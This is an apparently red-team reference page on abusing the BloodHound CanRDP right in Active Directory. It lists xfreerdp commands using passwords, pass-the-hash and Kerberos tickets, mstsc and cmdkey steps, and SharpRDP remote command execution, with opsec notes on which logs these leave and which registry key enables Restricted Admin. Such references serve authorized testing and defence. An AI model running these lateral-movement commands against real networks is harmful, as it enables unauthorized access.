🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / CanRDP

CanRDP

Principal has the right to Remote Desktop (RDP) login to the target computer.

Applies to: User/Group β†’ Computer

Linux Abuse

xfreerdp (password)

xfreerdp /u:<username> /p:'<password>' /d:<domain> /v:<target> /dynamic-resolution

xfreerdp (pass-the-hash)

xfreerdp /u:<username> /pth:<ntlm-hash> /d:<domain> /v:<target> /dynamic-resolution

xfreerdp (Kerberos ccache)

KRB5CCNAME=<ccache> xfreerdp /u:<username> /d:<domain> /v:<target> /sec:kerberos /dynamic-resolution

Windows Abuse

mstsc (interactive)

mstsc /v:<target>

PowerShell (cmdkey + mstsc)

cmdkey /generic:<target> /user:<domain>\<username> /pass:<password>
mstsc /v:<target>

SharpRDP (remote exec via RDP without GUI)

SharpRDP.exe computername=<target> command="calc.exe" username=<domain>\<username> password=<password>

Opsec

  • RDP logins generate Event ID 4624 (logon type 10) and 4778/4779 on target
  • Pass-the-hash via xfreerdp requires Restricted Admin mode enabled on target (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0)
  • SharpRDP leaves fewer GUI artifacts than interactive mstsc session